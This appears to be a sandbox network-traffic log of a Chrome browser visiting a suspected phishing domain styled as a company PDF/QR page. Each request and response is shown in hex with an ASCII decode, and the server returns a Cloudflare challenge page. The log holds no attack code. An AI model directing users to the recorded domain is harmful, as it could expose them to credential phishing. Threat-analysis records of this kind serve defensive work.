                                                                                                                                                Data Ascii: uMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);background-repeat:no-repeat;background-size:contain;padding-left:34px}@m
                                                                                                                                                2024-10-28 16:47:30 UTC1369INData Raw: 6b 38 66 6a 34 4b 62 4c 50 6d 61 55 4a 42 73 4a 70 6b 78 50 4b 6b 4e 70 73 72 45 39 62 42 78 31 52 74 43 63 36 4f 53 53 44 54 65 30 6b 50 56 46 65 43 65 58 4d 67 47 58 66 61 74 2e 39 42 4f 32 78 74 68 76 54 45 48 53 74 4a 66 44 38 58 30 30 71 4b 6a 7a 30 30 5a 39 5a 44 41 50 6f 36 65 4c 6a 30 53 6c 4d 50 51 34 74 62 33 50 52 66 44 76 59 5a 70 56 4b 34 36 56 41 6f 49 6c 4e 68 4a 4d 48 62 35 72 78 39 59 55 56 5a 30 4a 35 64 32 44 59 53 53 71 45 77 6d 5f 70 6f 69 57 45 7a 30 62 34 72 4d 4c 61 50 75 63 64 2e 42 76 64 32 49 34 38 62 42 53 6b 79 44 70 68 47 73 4e 5a 62 48 35 31 32 45 6b 42 7a 52 4d 5a 49 77 61 5f 79 7a 41 54 57 48 4b 4a 5a 46 32 51 7a 6a 76 51 39 78 50 2e 33 58 34 4e 66 49 74 30 61 67 50 6f 4b 35 62 45 73 2e 54 4c 51 5f 66 55 54 67 77 65 4b 5a
                                                                                                                                                Data Ascii: k8fj4KbLPmaUJBsJpkxPKkNpsrE9bBx1RtCc6OSSDTe0kPVFeCeXMgGXfat.9BO2xthvTEHStJfD8X00qKjz00Z9ZDAPo6eLj0SlMPQ4tb3PRfDvYZpVK46VAoIlNhJMHb5rx9YUVZ0J5d2DYSSqEwm_poiWEz0b4rMLaPucd.Bvd2I48bBSkyDphGsNZbH512EkBzRMZIwa_yzATWHKJZF2QzjvQ9xP.3X4NfIt0agPoK5bEs.TLQ_fUTgweKZ
                                                                                                                                                2024-10-28 16:47:30 UTC1369INData Raw: 7a 56 37 30 69 74 6a 72 68 31 38 7a 65 58 55 32 54 2e 56 73 51 35 61 7a 75 73 76 72 52 32 54 48 44 56 69 48 70 69 68 52 67 32 4b 77 4c 64 75 35 44 32 61 47 69 6a 56 61 4e 70 39 78 79 64 68 4c 7a 79 56 35 51 78 45 70 4b 77 30 52 58 6a 57 4a 66 33 71 78 71 56 48 61 65 54 69 6d 71 7a 77 69 6f 55 78 67 6a 39 4b 4e 59 35 53 44 6a 2e 53 54 71 65 59 6e 4c 39 70 4f 4c 79 34 41 37 2e 5a 50 4e 32 59 45 65 68 4b 53 4f 41 6a 79 6f 37 2e 2e 59 51 41 68 4f 62 64 42 72 67 57 30 67 69 34 6d 62 51 4d 39 6c 56 44 5a 62 42 69 4b 32 70 33 4a 53 6a 39 31 70 59 72 4d 6c 6f 47 55 7a 49 66 32 57 53 54 2e 76 4b 2e 63 6e 74 75 4c 69 55 77 43 4e 42 47 69 6c 62 79 73 38 61 74 54 42 6e 61 34 77 33 62 37 69 62 46 6a 7a 79 57 7a 69 7a 59 69 62 49 45 32 5f 53 33 43 31 52 46 44 34 47 68
                                                                                                                                                Data Ascii: zV70itjrh18zeXU2T.VsQ5azusvrR2THDViHpihRg2KwLdu5D2aGijVaNp9xydhLzyV5QxEpKw0RXjWJf3qxqVHaeTimqzwioUxgj9KNY5SDj.STqeYnL9pOLy4A7.ZPN2YEehKSOAjyo7..YQAhObdBrgW0gi4mbQM9lVDZbBiK2p3JSj91pYrMloGUzIf2WST.vK.cntuLiUwCNBGilbys8atTBna4w3b7ibFjzyWzizYibIE2_S3C1RFD4Gh
                                                                                                                                                2024-10-28 16:47:30 UTC1369INData Raw: 54 54 58 35 71 5f 58 36 39 51 6a 48 6b 5a 4a 58 68 46 43 62 35 47 4c 5f 71 44 43 64 61 6f 39 78 6a 48 4d 4c 75 56 33 50 78 6e 56 64 48 5a 4e 74 30 54 46 57 45 50 44 37 6e 47 36 7a 54 2e 47 70 36 79 54 70 57 45 6e 54 63 41 42 35 6a 42 59 2e 37 32 48 34 6a 35 73 4a 65 73 56 6e 35 36 6d 33 37 4a 4f 38 57 77 6a 54 4f 62 57 6e 46 52 35 4d 48 76 51 36 34 65 2e 76 48 44 58 53 6a 4c 6e 70 30 73 6c 57 66 64 50 43 49 67 59 41 33 38 33 30 5f 4c 44 54 31 6c 6b 42 68 30 50 57 76 54 67 39 68 2e 62 74 41 74 50 57 34 50 42 53 34 64 7a 44 2e 48 50 56 42 47 71 74 43 33 6a 57 4e 64 53 59 76 7a 72 4b 6e 6d 57 6f 30 64 47 42 6f 49 62 49 59 6d 45 79 4b 63 78 41 36 73 6b 56 36 78 41 33 36 69 68 70 70 67 51 79 41 59 43 46 34 71 77 5f 73 55 71 33 36 70 4a 4e 55 42 38 4b 57 58 44
                                                                                                                                                Data Ascii: TTX5q_X69QjHkZJXhFCb5GL_qDCdao9xjHMLuV3PxnVdHZNt0TFWEPD7nG6zT.Gp6yTpWEnTcAB5jBY.72H4j5sJesVn56m37JO8WwjTObWnFR5MHvQ64e.vHDXSjLnp0slWfdPCIgYA3830_LDT1lkBh0PWvTg9h.btAtPW4PBS4dzD.HPVBGqtC3jWNdSYvzrKnmWo0dGBoIbIYmEyKcxA6skV6xA36ihppgQyAYCF4qw_sUq36pJNUB8KWXD
                                                                                                                                                2024-10-28 16:47:30 UTC1369INData Raw: 68 5a 53 57 6d 32 48 37 43 61 48 66 34 4e 57 33 30 65 78 73 7a 65 6e 5a 5a 36 76 4f 57 4f 53 79 71 32 62 5f 75 46 67 51 73 52 50 4f 79 6b 7a 65 49 67 68 69 58 53 46 67 5a 7a 38 5a 71 4e 71 39 41 54 44 72 73 4a 34 34 7a 64 59 72 56 6a 4a 48 34 6a 41 6c 61 7a 58 4f 71 74 41 65 4f 38 2e 62 74 63 73 62 4b 79 30 77 6b 38 39 44 59 4c 48 48 42 42 6d 6d 31 36 54 64 63 4a 35 50 71 49 51 6a 4b 66 70 6b 75 39 2e 74 59 4c 6e 31 48 63 66 56 5f 59 32 65 44 78 59 66 63 43 45 53 59 57 43 4f 48 51 47 76 47 72 63 53 74 50 5a 75 73 34 4e 6f 58 64 42 57 63 39 4d 45 53 53 67 5a 39 69 54 73 4c 6c 2e 51 50 35 76 50 67 46 48 42 50 33 57 47 74 59 76 68 77 72 42 45 54 55 71 34 4a 4d 36 41 61 6c 67 44 6e 38 4e 2e 68 73 47 68 6b 67 61 73 30 47 61 67 6e 67 32 74 66 44 6d 33 6f 51 39
                                                                                                                                                Data Ascii: hZSWm2H7CaHf4NW30exszenZZ6vOWOSyq2b_uFgQsRPOykzeIghiXSFgZz8ZqNq9ATDrsJ44zdYrVjJH4jAlazXOqtAeO8.btcsbKy0wk89DYLHHBBmm16TdcJ5PqIQjKfpku9.tYLn1HcfV_Y2eDxYfcCESYWCOHQGvGrcStPZus4NoXdBWc9MESSgZ9iTsLl.QP5vPgFHBP3WGtYvhwrBETUq4JM6AalgDn8N.hsGhkgas0Gagng2tfDm3oQ9
                                                                                                                                                2024-10-28 16:47:30 UTC915INData Raw: 72 20 63 70 6f 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 63 70 6f 2e 73 72 63 20 3d 20 27 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 68 2f 62 2f 6f 72 63 68 65 73 74 72 61 74 65 2f 63 68 6c 5f 70 61 67 65 2f 76 31 3f 72 61 79 3d 38 64 39 63 36 38 37 36 65 65 31 33 62 64 30 66 27 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 20 3d 20 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 20 3d 3d 3d 20 27 27 20 26 26 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2e 69 6e 64 65 78 4f 66 28 27 23 27 29 20 21 3d 3d 20 2d 31 20 3f 20 27 23 27 20 3a 20 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f
                                                                                                                                                Data Ascii: r cpo = document.createElement('script');cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=8d9c6876ee13bd0f';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_
                                                                                                                                                2024-10-28 16:47:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                1192.168.2.164971135.190.80.14436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:31 UTC589OUTOPTIONS /report/v4?s=VnI77UMv%2Fxel4LiWfkTryGeF5PcshH9L2dHVaKi%2FUgF6nQ%2FXioiipm4KVrFXkzrLDAFeOYjaM1f4QQixlS1x%2F60y6X%2FFjYJEelxIx0HukPQFNyza8DSZHskGlPHG1aRT1bs9RXrvzK3cQyecd5z9jIwLIqy0GVA%3D HTTP/1.1
                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Origin: https://vokbz-iamgold.mobile-pdfqronline.com
                                                                                                                                                Access-Control-Request-Method: POST
                                                                                                                                                Access-Control-Request-Headers: content-type
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:31 UTC336INHTTP/1.1 200 OK
                                                                                                                                                Content-Length: 0
                                                                                                                                                access-control-max-age: 86400
                                                                                                                                                access-control-allow-methods: POST, OPTIONS
                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                access-control-allow-headers: content-type, content-length
                                                                                                                                                date: Mon, 28 Oct 2024 16:47:30 GMT
                                                                                                                                                Via: 1.1 google
                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                Connection: close


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                2192.168.2.1649712184.28.90.27443
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:31 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Accept: */*
                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                                                Host: fs.microsoft.com
                                                                                                                                                2024-10-28 16:47:31 UTC467INHTTP/1.1 200 OK
                                                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                Server: ECAcc (lpl/EF06)
                                                                                                                                                X-CID: 11
                                                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                X-Ms-Region: prod-weu-z1
                                                                                                                                                Cache-Control: public, max-age=158837
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:31 GMT
                                                                                                                                                Connection: close
                                                                                                                                                X-CID: 2


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                3192.168.2.164971335.190.80.14436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:31 UTC510OUTPOST /report/v4?s=VnI77UMv%2Fxel4LiWfkTryGeF5PcshH9L2dHVaKi%2FUgF6nQ%2FXioiipm4KVrFXkzrLDAFeOYjaM1f4QQixlS1x%2F60y6X%2FFjYJEelxIx0HukPQFNyza8DSZHskGlPHG1aRT1bs9RXrvzK3cQyecd5z9jIwLIqy0GVA%3D HTTP/1.1
                                                                                                                                                Host: a.nel.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Content-Length: 412
                                                                                                                                                Content-Type: application/reports+json
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:31 UTC412OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 34 39 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 37 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 76 6f 6b 62 7a 2d 69 61 6d 67 6f 6c 64 2e 6d 6f
                                                                                                                                                Data Ascii: [{"age":1,"body":{"elapsed_time":1496,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"188.114.97.3","status_code":403,"type":"http.error"},"type":"network-error","url":"https://vokbz-iamgold.mo
                                                                                                                                                2024-10-28 16:47:32 UTC168INHTTP/1.1 200 OK
                                                                                                                                                Content-Length: 0
                                                                                                                                                date: Mon, 28 Oct 2024 16:47:31 GMT
                                                                                                                                                Via: 1.1 google
                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                Connection: close


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                4192.168.2.1649717188.114.97.34436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:32 UTC957OUTGET /11384/ HTTP/1.1
                                                                                                                                                Host: vokbz-iamgold.mobile-pdfqronline.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                sec-ch-ua-arch: "x86"
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                sec-ch-ua-model: ""
                                                                                                                                                sec-ch-ua-bitness: "64"
                                                                                                                                                sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:32 UTC1285INHTTP/1.1 403 Forbidden
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:32 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                Origin-Agent-Cluster: ?1
                                                                                                                                                Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                X-Content-Options: nosniff
                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                cf-mitigated: challenge
                                                                                                                                                2024-10-28 16:47:32 UTC918INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 73 76 49 55 6c 6d 65 39 64 50 39 68 6f 51 36 79 48 6f 49 41 66 64 66 72 68 73 6e 38 4d 52 69 31 7a 7a 63 51 54 32 75 36 4f 75 57 36 67 2f 45 58 64 33 4f 6d 51 57 43 76 37 42 7a 50 6d 38 5a 78 36 33 42 6b 67 51 6c 36 45 6e 49 72 78 62 2b 42 6a 45 4c 33 42 77 44 47 2f 30 42 47 55 4c 78 75 53 72 67 2f 57 65 74 4c 76 66 77 3d 24 53 46 6d 35 42 74 67 2b 2b 70 4f 55 67 46 78 66 52 48 5a 6c 53 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                                                                                                                                Data Ascii: cf-chl-out: svIUlme9dP9hoQ6yHoIAfdfrhsn8MRi1zzcQT2u6OuW6g/EXd3OmQWCv7BzPm8Zx63BkgQl6EnIrxb+BjEL3BwDG/0BGULxuSrg/WetLvfw=$SFm5Btg++pOUgFxfRHZlSg==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                                                                                                                                2024-10-28 16:47:32 UTC1369INData Raw: 32 34 32 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                                                                                                                Data Ascii: 2421<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                                                                                                                                2024-10-28 16:47:32 UTC1369INData Raw: 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 40 6d
                                                                                                                                                Data Ascii: uMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);background-repeat:no-repeat;background-size:contain;padding-left:34px}@m
                                                                                                                                                2024-10-28 16:47:32 UTC1369INData Raw: 35 6b 54 77 31 33 63 32 41 38 72 41 4f 44 57 65 33 66 79 55 53 66 74 6e 46 57 33 55 41 50 73 4f 67 69 39 59 56 68 34 5a 70 69 75 6c 47 4c 4f 66 31 2e 6c 6a 4b 7a 65 4f 61 48 53 4f 73 7a 51 4a 4d 63 38 51 76 66 56 77 62 42 6c 44 41 50 67 57 4d 33 44 49 39 77 75 6f 6a 4d 77 64 2e 73 71 76 72 42 47 49 55 53 6d 58 34 76 64 42 77 51 7a 67 36 38 47 61 75 53 42 79 4e 34 47 6c 53 77 67 51 74 7a 32 78 70 36 63 41 56 58 7a 63 36 4f 6c 4b 4b 57 71 66 59 58 6b 58 63 36 67 54 57 51 72 39 39 70 4a 6d 33 54 2e 4a 75 2e 4a 31 49 33 69 59 62 65 72 78 4c 62 36 55 6b 63 35 64 57 32 31 6f 58 45 6d 55 6b 72 48 38 57 70 33 7a 59 71 61 61 67 42 6d 78 6b 6f 71 72 7a 46 61 51 44 6c 76 5f 31 47 48 70 67 56 6a 53 70 4c 45 45 39 79 4a 4b 35 57 7a 63 35 58 62 4b 74 6a 34 46 6a 48 34
                                                                                                                                                Data Ascii: 5kTw13c2A8rAODWe3fyUSftnFW3UAPsOgi9YVh4ZpiulGLOf1.ljKzeOaHSOszQJMc8QvfVwbBlDAPgWM3DI9wuojMwd.sqvrBGIUSmX4vdBwQzg68GauSByN4GlSwgQtz2xp6cAVXzc6OlKKWqfYXkXc6gTWQr99pJm3T.Ju.J1I3iYberxLb6Ukc5dW21oXEmUkrH8Wp3zYqaagBmxkoqrzFaQDlv_1GHpgVjSpLEE9yJK5Wzc5XbKtj4FjH4
                                                                                                                                                2024-10-28 16:47:32 UTC1369INData Raw: 48 58 5f 74 31 30 75 50 36 4a 51 32 68 78 36 31 32 74 4a 50 65 78 41 4a 35 7a 4f 35 73 76 36 42 31 51 79 6b 4a 65 4b 67 43 4f 64 73 6f 4e 63 62 5f 44 54 4f 32 7a 79 4c 55 52 4f 68 62 2e 56 66 76 53 6f 68 32 55 4e 6f 6e 36 55 37 51 7a 52 43 69 52 4d 50 55 41 43 32 50 72 54 64 77 49 2e 46 6c 73 70 35 65 4c 61 6c 30 57 54 31 56 37 53 43 38 69 46 32 70 4c 4f 46 79 6c 38 69 53 68 41 49 57 2e 34 53 50 4d 43 51 4d 31 37 35 56 43 67 41 76 72 56 70 4d 33 49 53 66 6a 6d 39 50 4f 7a 75 72 5a 67 58 59 34 78 71 57 59 6c 58 5a 34 68 65 61 74 68 6f 32 46 6d 6e 79 51 65 6d 33 68 6c 39 44 45 45 6b 73 36 43 68 71 62 58 52 67 6d 2e 55 6c 50 79 77 66 78 31 65 4c 57 2e 4e 54 33 6e 4d 4b 5a 37 48 57 77 6c 76 37 61 69 4a 42 50 43 68 5a 63 39 78 51 30 38 77 43 65 78 6b 6d 54 65
                                                                                                                                                Data Ascii: HX_t10uP6JQ2hx612tJPexAJ5zO5sv6B1QykJeKgCOdsoNcb_DTO2zyLUROhb.VfvSoh2UNon6U7QzRCiRMPUAC2PrTdwI.Flsp5eLal0WT1V7SC8iF2pLOFyl8iShAIW.4SPMCQM175VCgAvrVpM3ISfjm9POzurZgXY4xqWYlXZ4heatho2FmnyQem3hl9DEEks6ChqbXRgm.UlPywfx1eLW.NT3nMKZ7HWwlv7aiJBPChZc9xQ08wCexkmTe
                                                                                                                                                2024-10-28 16:47:32 UTC1369INData Raw: 57 74 53 37 2e 73 41 70 76 32 72 4f 42 39 65 52 48 78 2e 57 6e 74 6c 4b 36 44 53 6b 33 46 65 33 39 4b 72 37 68 63 30 5f 53 53 44 79 66 31 51 46 66 55 78 75 5a 46 47 45 42 59 67 35 52 4b 65 33 6f 69 6c 6d 54 6b 44 7a 69 63 65 6b 68 6c 43 37 6c 76 4a 35 30 4e 32 71 5f 5f 36 64 57 63 34 36 68 34 72 42 61 74 69 6d 38 55 59 4d 31 62 35 33 53 78 30 47 63 2e 30 53 4c 4a 46 71 71 39 6d 5a 70 6a 50 4b 64 66 31 76 7a 4a 77 51 77 6a 67 36 58 52 4f 4c 70 69 53 78 4c 4d 61 5f 48 76 42 54 6f 74 36 50 66 79 68 45 39 49 46 33 6e 63 39 7a 4b 76 43 6e 4d 4b 6d 66 41 53 4f 38 49 30 6b 46 43 4a 56 4e 4c 6c 56 69 6f 76 6f 59 34 64 64 34 6d 39 61 59 55 69 76 6b 54 6d 4a 65 6a 66 67 6f 57 31 50 43 7a 7a 77 69 56 76 73 33 2e 39 44 52 39 5f 4d 37 52 4f 39 4b 36 65 47 78 6b 57 64
                                                                                                                                                Data Ascii: WtS7.sApv2rOB9eRHx.WntlK6DSk3Fe39Kr7hc0_SSDyf1QFfUxuZFGEBYg5RKe3oilmTkDzicekhlC7lvJ50N2q__6dWc46h4rBatim8UYM1b53Sx0Gc.0SLJFqq9mZpjPKdf1vzJwQwjg6XROLpiSxLMa_HvBTot6PfyhE9IF3nc9zKvCnMKmfASO8I0kFCJVNLlViovoY4dd4m9aYUivkTmJejfgoW1PCzzwiVvs3.9DR9_M7RO9K6eGxkWd
